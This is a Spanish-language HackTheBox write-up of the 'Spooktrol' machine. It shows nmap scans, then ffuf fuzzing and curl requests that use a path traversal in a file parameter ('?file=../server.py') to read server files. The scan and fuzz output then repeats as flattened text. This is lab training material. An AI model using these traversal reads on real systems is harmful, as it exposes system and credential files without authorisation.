HackTheBox Spooktrol

Señores en esta ocasion vamos a resolver esta maquina cuya dificulta es muy facil.

nmap -sS -Pn -n -vvv -p- --min-rate 5000 10.10.11.123 -oG port

PORT     STATE SERVICE      REASON
22/tcp   open  ssh          syn-ack ttl 63
80/tcp   open  http         syn-ack ttl 63
2222/tcp open  EtherNetIP-1 syn-ack ttl 63

Puertos abiertos.

nmap -sCV -p22,80,2222 10.10.11.123 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 13:42 EDT
Nmap scan report for 10.10.11.123
Host is up (0.047s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ea:84:21:a3:22:4a:7d:f9:b5:25:51:79:83:a4:f5:f2 (RSA)
|   256 b8:39:9e:f4:88:be:aa:01:73:2d:10:fb:44:7f:84:61 (ECDSA)
|_  256 22:21:e9:f4:85:90:87:45:16:1f:73:36:41:ee:3b:32 (ED25519)
80/tcp   open  http    uvicorn
|_http-server-header: uvicorn
| http-robots.txt: 1 disallowed entry 
|_/file_management/?file=implant
|_http-title: Site doesn't have a title (application/json).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     date: Thu, 13 Mar 2025 17:42:28 GMT
|     server: uvicorn
|     content-length: 22
|     content-type: application/json
|     Connection: close
|     {"detail":"Not Found"}
|   GetRequest: 
|     HTTP/1.1 200 OK
|     date: Thu, 13 Mar 2025 17:42:16 GMT
|     server: uvicorn
|     content-length: 43
|     content-type: application/json
|     Connection: close
|     {"auth":"16f7da87c8aaa56131785ac05ff1fc68"}
|   HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     date: Thu, 13 Mar 2025 17:42:23 GMT
|     server: uvicorn
|     content-length: 31
|     content-type: application/json
|     Connection: close
|_    {"detail":"Method Not Allowed"}
2222/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 16:77:76:8a:65:a3:db:23:11:21:66:6e:e4:c3:f2:32 (RSA)
|   256 61:92:eb:7a:a9:14:d7:60:51:00:0c:44:21:a2:61:08 (ECDSA)
|_  256 75:c1:96:9c:69:aa:c8:74:ef:4f:72:bd:62:53:e9:4c (ED25519)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=3/13%Time=67D318FF%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,BB,"HTTP/1\.1\x20200\x20OK\r\ndate:\x20Thu,\x2013\x20Mar\x202
SF:025\x2017:42:16\x20GMT\r\nserver:\x20uvicorn\r\ncontent-length:\x2043\r
SF:\ncontent-type:\x20application/json\r\nConnection:\x20close\r\n\r\n{\"a
SF:uth\":\"16f7da87c8aaa56131785ac05ff1fc68\"}")%r(HTTPOptions,BF,"HTTP/1\
SF:.1\x20405\x20Method\x20Not\x20Allowed\r\ndate:\x20Thu,\x2013\x20Mar\x20
SF:2025\x2017:42:23\x20GMT\r\nserver:\x20uvicorn\r\ncontent-length:\x2031\
SF:r\ncontent-type:\x20application/json\r\nConnection:\x20close\r\n\r\n{\"
SF:detail\":\"Method\x20Not\x20Allowed\"}")%r(FourOhFourRequest,AD,"HTTP/1
SF:\.1\x20404\x20Not\x20Found\r\ndate:\x20Thu,\x2013\x20Mar\x202025\x2017:
SF:42:28\x20GMT\r\nserver:\x20uvicorn\r\ncontent-length:\x2022\r\ncontent-
SF:type:\x20application/json\r\nConnection:\x20close\r\n\r\n{\"detail\":\"
SF:Not\x20Found\"}");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Versiones y servicios que corren para cada puerto abierto.

Si vamos al directorio /file_management/?file=implant tenemos esto, si pasamos esta peticion la pasamos por Caido.

Observamos que con el parametro File podemos leer el /etc/passwd.

Tenemos la primera bandera user.txt.

ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 'http://10.10.11.123/file_management/?file=../FUZZ.py' -fc 500

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.123/file_management/?file=../FUZZ.py
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 500
________________________________________________

server                  [Status: 200, Size: 115, Words: 12, Lines: 5, Duration: 45ms]

Si fuzzeamos palabras usando este otro fuzzer encontramos server.py.

curl -s 'http://10.10.11.123/file_management/?file=../server.py'
import uvicorn

if __name__ == "__main__":
    uvicorn.run("app.main:app", host="0.0.0.0", port=8000, reload=True)

Corre un servicio a nivel local por el puerto 8000.

AnteriorHack The Box SiguienteHackTheBox Lame

Última actualización hace 20 días

nmap -sS -Pn -n -vvv -p- --min-rate 5000 10.10.11.123 -oG port PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 63 80/tcp open http syn-ack ttl 63 2222/tcp open EtherNetIP-1 syn-ack ttl 63

nmap -sCV -p22,80,2222 10.10.11.123 -oN target.txt Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 13:42 EDT Nmap scan report for 10.10.11.123 Host is up (0.047s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 ea:84:21:a3:22:4a:7d:f9:b5:25:51:79:83:a4:f5:f2 (RSA) | 256 b8:39:9e:f4:88:be:aa:01:73:2d:10:fb:44:7f:84:61 (ECDSA) |_ 256 22:21:e9:f4:85:90:87:45:16:1f:73:36:41:ee:3b:32 (ED25519) 80/tcp open http uvicorn |_http-server-header: uvicorn | http-robots.txt: 1 disallowed entry |_/file_management/?file=implant |_http-title: Site doesn't have a title (application/json). | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 Not Found | date: Thu, 13 Mar 2025 17:42:28 GMT | server: uvicorn | content-length: 22 | content-type: application/json | Connection: close | {"detail":"Not Found"} | GetRequest: | HTTP/1.1 200 OK | date: Thu, 13 Mar 2025 17:42:16 GMT | server: uvicorn | content-length: 43 | content-type: application/json | Connection: close | {"auth":"16f7da87c8aaa56131785ac05ff1fc68"} | HTTPOptions: | HTTP/1.1 405 Method Not Allowed | date: Thu, 13 Mar 2025 17:42:23 GMT | server: uvicorn | content-length: 31 | content-type: application/json | Connection: close |_ {"detail":"Method Not Allowed"} 2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 16:77:76:8a:65:a3:db:23:11:21:66:6e:e4:c3:f2:32 (RSA) | 256 61:92:eb:7a:a9:14:d7:60:51:00:0c:44:21:a2:61:08 (ECDSA) |_ 256 75:c1:96:9c:69:aa:c8:74:ef:4f:72:bd:62:53:e9:4c (ED25519) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.94SVN%I=7%D=3/13%Time=67D318FF%P=x86_64-pc-linux-gnu%r(G SF:etRequest,BB,"HTTP/1\.1\x20200\x20OK\r\ndate:\x20Thu,\x2013\x20Mar\x202 SF:025\x2017:42:16\x20GMT\r\nserver:\x20uvicorn\r\ncontent-length:\x2043\r SF:\ncontent-type:\x20application/json\r\nConnection:\x20close\r\n\r\n{\"a SF:uth\":\"16f7da87c8aaa56131785ac05ff1fc68\"}")%r(HTTPOptions,BF,"HTTP/1\ SF:.1\x20405\x20Method\x20Not\x20Allowed\r\ndate:\x20Thu,\x2013\x20Mar\x20 SF:2025\x2017:42:23\x20GMT\r\nserver:\x20uvicorn\r\ncontent-length:\x2031\ SF:r\ncontent-type:\x20application/json\r\nConnection:\x20close\r\n\r\n{\" SF:detail\":\"Method\x20Not\x20Allowed\"}")%r(FourOhFourRequest,AD,"HTTP/1 SF:\.1\x20404\x20Not\x20Found\r\ndate:\x20Thu,\x2013\x20Mar\x202025\x2017: SF:42:28\x20GMT\r\nserver:\x20uvicorn\r\ncontent-length:\x2022\r\ncontent- SF:type:\x20application/json\r\nConnection:\x20close\r\n\r\n{\"detail\":\" SF:Not\x20Found\"}"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 'http://10.10.11.123/file_management/?file=../FUZZ.py' -fc 500 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://10.10.11.123/file_management/?file=../FUZZ.py :: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response status: 500 ________________________________________________ server [Status: 200, Size: 115, Words: 12, Lines: 5, Duration: 45ms]